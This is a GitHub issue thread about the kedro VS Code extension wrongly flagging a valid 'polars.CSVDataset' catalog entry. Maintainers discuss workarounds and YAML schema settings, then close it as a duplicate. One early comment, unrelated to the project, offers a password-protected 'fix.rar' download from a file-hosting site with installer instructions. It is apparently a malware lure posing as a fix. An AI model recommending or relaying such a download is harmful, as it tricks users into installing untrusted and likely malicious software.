### ISSUE TITLE
gives error on correct `type: polars.CSVDataset` in catalog

### ISSUE THREAD

**Issue by pietroppeter** [kedro-org/vscode-kedro#79]
## Description

When using the extension with an element in catalog that has a `polars.CSVDataset` the extension reports error because the type is not in one of the allowed ones (it fails the recognize the installation of `kedro-datasets[polars]`

Screenshot:
![image](https://github.com/user-attachments/assets/2aa84baf-43b6-4b93-8c08-ba13bfe8f03b)

## Context

I see the extension is very new and looks very nice and useful. It is not a big problem for me at the moment.
I am wondering if there is a workaround where I can tell LSP to shutup and do not show the error.

## Steps to Reproduce

1. create a kedro project with `kedro-datasets[polars]` element in catalog
2. verify that you can load the element from catalog
3. verify that the extension marks it as error (see screenshot above)

## Checklist
- [x] Have you read the ["Requirements" section ](https://github.com/kedro-org/vscode-kedro?tab=readme-ov-file#requirements) already?
  - yes, my VS Code version is 1.92.2
- [ ] Have you make sure you are running the extension with the correct virtual environment? `Cmd + P` and `Python: Select Interpreter`
   - mmh, indeed not sure about that. I do not have an interpreter selected. the project is set up with uv and this in particular creates a .venv folder, not sure how to tell how to use that

![image](https://github.com/user-attachments/assets/ff5d5e21-0d9b-4668-af9c-3ca448f171e9)

## Expected Result

do not report error

## Actual Result

reports error for polars.CSVDataset (screenshot above)

## Your Environment

* Kedro version used (`pip show kedro` or `kedro -V`): version 0.19.8
* Kedro VSCode version used: v0.1.1
* Python version used (`python -V`): 3.12.5
* Operating system and version: MacOS Sonoma 14.3
* **note**: project setup with uv

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by astrojuanlu** [comment]
Similar to https://github.com/kedro-org/vscode-kedro/issues/5, but not exactly 🤔

**Comment by noklam** [comment]
There is an experimental flag in settings, if you turn it off does it helps? Make sure you restarted vscode too as I found it sometimes caching the extension in an unexpected way.

**Comment by noklam** [comment]
@pietroppeter I saw you give an thumbs up emoji, just want to be sure if the `experimental` flag help? I expect this will be a temporary workaround as we are working on a [new big feature](https://github.com/kedro-org/vscode-kedro/pull/65) that will come out soon. 

We may have some time to clean up some bugs after that.

**Comment by pietroppeter** [comment]
hi @noklam, no the experimental flag disabled did not help (I did restart VS code). sorry but this week cannot follow up more, will try maybe next week to create a small reproducible project (it should not be too hard). not at all an urgent thing for me anyway

**Comment by noklam** [comment]
@pietroppeter thanks a lot for the feedback! No  rush at all, I will see if I can fix this.

**Comment by noklam** [comment]
@jitu5 Do you have any thought on this? I think for other features it's easier to disable with a flag, for YAML schema validation, it's done via the `yaml.schema` contribution point right at the `package.json` so I don't know if there is a nice way to disable it.

i am trying to look at https://github.com/redhat-developer/vscode-yaml but cannot find a proper API to use.

**Comment by jitu5** [comment]
> @jitu5 Do you have any thought on this? I think for other features it's easier to disable with a flag, for YAML schema validation, it's done via the `yaml.schema` contribution point right at the `package.json` so I don't know if there is a nice way to disable it.
> 
> i am trying to look at https://github.com/redhat-developer/vscode-yaml but cannot find a proper API to use. In additional, we shouldn't get stuck with the current status if better alternative exists. We want it to be flexible enough to support custom dataset eventually, so pointing to a fix URL isn't a good idea anyway.
> 
> I [tried to ask](https://github.com/redhat-developer/vscode-yaml/discussions/1020) but there is very little activity on the repo.
> 
> * https://github.com/redhat-developer/vscode-yaml/blob/41e0be736f2d07cdf7489e1c1c591b35b990e096/test/helper.ts#L48
> * https://github.com/redhat-developer/vscode-yaml/blob/41e0be736f2d07cdf7489e1c1c591b35b990e096/src/schema-status-bar-item.ts#L215
> * https://github.com/redhat-developer/vscode-yaml/blob/41e0be736f2d07cdf7489e1c1c591b35b990e096/src/schema-extension-api.ts
>   Is the closest thing I can find.

@noklam from https://github.com/redhat-developer/yaml-language-server Is it possible to have a custom schema file with a missing property, like the one shown in the documentation?

```
"yaml.schemas": {
    "http://json.schemastore.org/composer": ["/*"],
    "file:///home/johnd/some-schema.json": ["some.yaml"],
    "../relative/path/schema.json": ["/config*.yaml"],
    "/Users/johnd/some-schema.json": ["some.yaml"],
}
```

in our case 

```
"yaml.schemas": {
    "https://abc.com/custom-jsonschema.json": "conf/**/*catalog*",
    "https://raw.githubusercontent.com/kedro-org/kedro/develop/static/jsonschema/kedro-catalog-0.19.json": "conf/**/*catalog*"
},
```
I tried the above, but for some reason, it didn’t work. I’m also not entirely sure if this is the correct approach. Additionally, I couldn’t find a clear way to disable it from docs.

**Comment by noklam** [comment]
I am closing this issue, as this is exactly the same problem as #5 to keep the discussion in one place.
